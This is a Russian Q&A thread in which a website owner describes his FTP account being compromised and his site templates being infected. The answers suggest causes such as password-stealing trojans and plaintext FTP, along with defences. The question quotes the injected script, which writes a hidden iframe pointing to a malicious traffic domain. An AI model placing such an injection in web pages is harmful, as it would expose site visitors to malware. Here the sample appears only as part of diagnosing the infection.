Вирусы на сайте. Как взломали FTP?

Question

[AlexeyNadezhin]

2 июля неожиданно пришло мне на почту вот такое письмо от Яндекса:

Some of the pages on your website may pose a threat to your visitor's computer security. The number of potentially harmful pages is 1.

Зарегистрировался на webmaster.yandex.com, запустил повторную проверку. На следующий день оно написало, что всё нормально, но я всё таки решил сравнить все файлы сайта с прошлогодней копией. Оказалось, что отличаются 12 файлов.


В папке temlates два файла имели дату 29.06.12. В файле header.tpl вместо строки

<body style="background: url(<?=PATH_WEB?>img/main_bg.gif) repeat-y center #244e9f;">

обнаружилось вот такое безобразие:

<body style="background: url(<?=PATH_WEB?><!--c3284d--> type="text/javascript">
document.write('<iframe src="httр://yоgоtraff.cu.cc/in.cgi?11" name="Google " scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->

img/main_bg.gif) repeat-y center #244e9f;">

То же самое было в файле galleryEdit.tpl и ещё в десяти файлах в папке script\jscalendar.


Если поискать в Google, этот yogotraff можно встретить в коде множества русских сайтов: www.google.ru/search?ie=UTF-8&hl=ru&q=yogotraff.


Явно, это какая-то вредоносная дрянь. Разумеется, я восстановил файлы, поменял пароли и написал запрос хостинг-провайдеру, с вопросом каким образом произошло заражение. Получил ответ и логи. В это время кто-то с американского адреса 208.77.96.72 залез на два моих ftp (причём второе находится внутри первого) и заменил там кучу файлов. Как выяснилось, пострадали и другие мои сайты. Провайдер предложил проверить мой компьютер на вирусы. Проверил. DrWeb'ом и Касперским с загрузочных дисков для очистки совести. Нету вирусов. Только всякая мелочёвка в кэше FireFox'а. И как же тогда у меня утащили ftp-пароль? Он сложный, его не подберёшь.


Как страшно жить.

Answer 1

[Ruma7a]

«Он сложный, его не подберёшь»

Угу, только вот передаётся в виде plain text ) Может стоит подумать об SSH/SFTP? Заранее прошу прощения, если у вас и так уже всё секурно в этом плане, просто у вас там упоминается «просто» FTP.

Comments

[AlexeyNadezhin]

Для ftp используется FAR. Так что да, plain text. Но всё равно не понимаю, каким образом это можно утащить.

[Ruma7a]

Если не троян, то как сложный, но не совсем уж фантастичный вариант — перехват FTP-трафика на маршруте. Выковырять текст пароль из сдампленных пакетов — сами понимаете, отнюдь не ракетная наука.

[Ruma7a]

И для, фара, кстати, есть NetBox, который на базе WinSCP — от оно поддерживает усе типы FTP. Правда, как-то странно оно у меня работает(бинарные файлы упорно передавало в текстовом режиме, игнорируя настройки). Но шифрование — поддерживает.

[Wott]

Еще есть Far Navigator
А перехватывать трафик могут любые компы в локалке. В принципе троянец может стоять и не на вашей машине.

Answer 2

[Владимир Дубровин]

Достаточно стандартная ситуация — прут троянцем FTP-пароли на сайты. То есть вирусы есть или были. Ищите троянца на всех компьютерах, с которых был доступ к сайту по FTP, возможно ходили еще откуда-то и забыли об этом. Меняйте пароль на FTP-доступ. Через шел ставьте разрешения на файлы такие, чтобы через FTP нельзя было их перезаписать, каждый раз, когда необходимо обновить сайт — меняйте разрешения обратно.

Comments

[AlexeyNadezhin]

Спасибо! Про разрешения отличная идея.

[Владимир Дубровин]

Но имейте ввиду, что это временное решение — пока не найдете где троянец сидит, потому что он есть.

[Алексей Журбицкий]

И никогда не ставьте галочку «сохранить пароль» в ftp клиентах.

[Владимир Дубровин]

Не всегда помогает, троянец может брать пароли напрямую из сессий, перехватывая соединения, через LSP, например.

[Wott]

Некотрые клиенты и сервера позволяют менять и доступ и владельца. В принципе в FTP есть возможность запускать команду на сервере.

Answer 3

[Константин Фролов]

А у хостера не Plesk случаем?

Comments

[Solver]

А что не так с Plesk?
Мне хостер предлагает перейти на него. С виду удобная система. Есть менеджер для андроида…

Answer 4

[Niemand]

Знаю точно, что так прут пароли из старых версий Filezilla, WS_FTP (про новые не знаю) и Total Commander.

Answer 5

[freem4n]

Сайты хостятся на шаредном хостинге? ОС сервера?

Comments

[AlexeyNadezhin]

hc.ru Фиге его знает, какая там ОС.

Answer 6

[charliez]

достаточно зайти на зараженный по такой же схеме сайт любым браузером, и через уязвимости adobe flash / sun java вирус активируется на компьютере и сканирует сохраненные пароли в файлах настроек популярных ftp клиентов.

Answer 7

[odmin4eg]

стандартная ситуация, как пишут выше, протроянен комп с которого хоть раз заходили на сайт.

троянцы давно умеют собирать пароли с «фар» «тотал коммандера» и прочих популярных программ.

меняйте пароли следите за попытками входа, ограничте входящие айпи на фтп